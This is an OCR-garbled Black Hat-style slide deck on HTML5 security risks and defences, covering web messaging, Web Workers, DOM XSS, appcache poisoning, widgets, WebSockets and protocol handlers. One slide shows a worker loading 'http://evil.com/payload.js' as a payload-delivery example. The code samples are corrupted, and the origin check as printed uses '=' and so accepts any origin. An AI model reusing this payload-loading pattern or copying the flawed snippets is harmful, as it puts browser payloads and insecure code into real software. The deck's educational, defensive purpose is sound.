Iframe or Web Worker can glue two streams - 
same domain or cross domain 



Q 
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Origin check 



<script> 

window.addEventListensr(‘message 1 r receiver, false); 
function receiver(e) 

{ 

if (e.origin = 'http: //192 . 163 . 100 .123 1 ) 

{ 

document.getElememtByld (' pi 1 ) .innerHTML= e.data 

} 

else 

{ 

alert ( "Different Origin n ) ; 

//alert(e.data); 

> 


</script> 


U5A 
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Web Worker - Hacks! 


Web Workers allows threading into HTML 
pages using JavaScript 

No need to use JavaScript calls like 
setTimeout(), setlntervalQ, XMLHttpRequest, 
and event handlers 

Totally Async and well supported 
[initialize] var worker = new Worker('task.js'); 
[Messaging] worker.postMessage(); 


black^t 
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Web Worker - Hacks! 





Background 
Thread on same page 
- messaging 


Q 
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Web Worker - Hacks! 


Security issues 

- It is not allowing to load cross domain worker 
scripts, (http:, https:,javascript:,data : -No) 

- It has some typical issues 

• It allows the use of XHR. Hence, in-domain and CORS 
requests possible 

• It can cause DoS - if user get stream to run JavaScript 
worker thread. Don't have access to parent DOM 
though 

• Message validation needed - else DOM based XSS 


blackHiat 
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Web Worker - Hacks! 


• Exmaple 

<html> 

<button onclick="Read()">Read Last Message</button> 
<button onclick="stop()">Stop</button> 

<output id="result"></output> 

<script> 

function Read() { 

worker.postMessage({’cmd' : 'read', 'msg': ’last'}); 

} 



function stop() { 

worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); 
alert("Worker stopped"); 

} 


var worker = new Worker('message.js'); 


worker.addEventListener('message', function (e) { 

document.getElementByld('result').innerHTML = e.data; 
}, false); 

</script> 

</html> 


Q 
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Web Workers - Hacks! 


Possible to cause XSS 

- Running script 

- Passing hidden payload 

Also, web workers can help in embedding silent 
running js file and can be controlled. 

Can be a tool for payload delivery and control 
within browser framework 

importScripts("http://evil.com/payload.js") - 
worker can run cross domain script 


Q 
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A 


Scan and Defend 


Scan and look for 

- JavaScript scanning 

- Messaging and Worker implementation 

Defense and Countermeasures 

- Same origin listening is a must for messaging 
event 


Q 
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DOM with HTML5 
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DOM based XSS - Messaging 


It is a sleeping giant in the Ajax applications 
coupled with Web Messaging 

Root cause 

- DOM is already loaded 

- Application is single page and DOM remains same 

- New information coming needs to be injected in using 
various DOM calls like eval() 

- Information is coming from untrusted sources 

- JSONP usage 

- Web Workers and callbacks 




usa 





AJAX with HTML5-D0M 


Ajax function would be making a back-end ca 

Back-end would be returning JSON stream or 
any other and get injected in DOM 

In some libraries their content type would 
allow them to get loaded in browser directly 

In that case bypassing DOM processing... 

# 
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Scan and Defend 

* » * » . — — 


Scan and look for 

- DOM calls 

- Use of eval(), document.* calls etc. 

Defense and Countermeasures 

- Secure JavaScript coding 


Q 
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A8 - Third party/Offline HTML Widgets 


and Gadgets 
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Offline Apps 


• HTML5 supports caching pages for offline 
usage 

• <html manifest= l 7appcache.manifest"> 

• List of pages gets stored 

• Possible to attack and cache poisoning 

- Untrusted network or proxy can inject malicious 
script 

- When you get on to actual app that script gets 
executed and keep eye on your activities 
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HTML5 Widgets 


Widgets/Gadgets/Modules - popular with 
HTML5 applications 

Small programs runs under browser and using 
Web Workers and Messaging 

JavaScript and HTML based components 

In some cases they share same DOM - Yes, same 
DOM 

It can cause a cross widget channels and 
ifra me/sand box 


Q 
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Cross DOM Access 


HTML5 - Web Messaging and Workers 


/ 

7 

/ 

7 

7 

7 

Widget 1 


Widget 2 


Widget 3 

Email Widget 

/ 


RSS Feed Reader 

/ 


Attacker 

7 


jm 


m~7 


DOM - Shared DOM 


/ 


Setting the trap 
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HTML5-Traps 


It is possible to access DOM events, variables, 
logic etc. 

Sandbox is required at the architecture layer to 
protect cross widget access 

Segregating DOM by iframe may help 

Flash based widget is having its own issues as 
well 

Code analysis of widgets before allowing them to 
load 
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Web Sockets 


HTML5 allows Web Socket APIs - full duplex 
TCP channel through JavaScript 

Allows cross domain connection like CORS 

Possible threats 

- Back door and browser shell 

- Quick port scanning 

- Botnet and malware can leverage (one to many 
connections) 

- Sniffer based on Web Socket 
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Internal Scanning 


Allows internal scanning, setting backward 
hidden channel, opening calls to proxy/cache. 

Some browsers have blocked these calls for 
security reason.; 


Elements ^ j Resources 1 Network ^Scripts Time line ^ Profiles [(^Audits ^ Console 

Name 

A |-1 

Path 

Headers Cookies Timing 

j 192.165.100.1 

Request URL: ws ://192 . 168 . 100 . 1/ 

1_1 192.165. TOO. 1 

t Request Headers 

1 1 192.165.100.1 

Connection: Upgrade 

u 

Host: 192.168.100.1 

Origin: http : //mm. andlabs . org 


Sec-WebSocket-Key1: 33 8 66 a 7 3 ' 5 31 


Sec-Web5ocket-Key2: 67 1= 87*1 $ 76 0] 


Upgrade: WebSocket 


(Key3): BC : 11 : F0 : 16 : 60 : BC : 50 : C8 

12 requests 1 00 transferred 


IP >i • S All 

Documents Stvlesheets Imaaes Scrints XHR Fonts Other 
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A10 - Protocol/Schema/APIs attacks 

with HTML5 
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Custom protocol/schema 


HTML5 allows custom protocol and schema 
registration 

Example 

- navigator.registerProtocolHandler("mailto", 
"http://www.foo.com/?uri=%s", "My Mail 11 ); 

It is possible to abuse this feature in certain 
cases 

Browser follows and gets registered for same 
domain though 
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• HTML5 few other APIs are interesting from 

security standpoint 

- File APIs - allows local file access and can mixed 
with Clickjacking and other attacks to gain client 
files. 

- Drag-Drop APIs - exploiting self XSS and few other 
tricks, hijacking cookies... 

- Lot more to explore and defend... 
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Resources/References 


• http://www.html5rocks.com/en/ (Solid stuff) 

• https://www.owasp.org/index.php/HTML5 Se 

curity Cheat Sheet (OWASP stuff) 

• http://html5sec.org/ (Quick Cheat sheet) 

• http://html5security.org/ (Good resources) 

• http://blog.kotowicz.net/ (Interesting work) 
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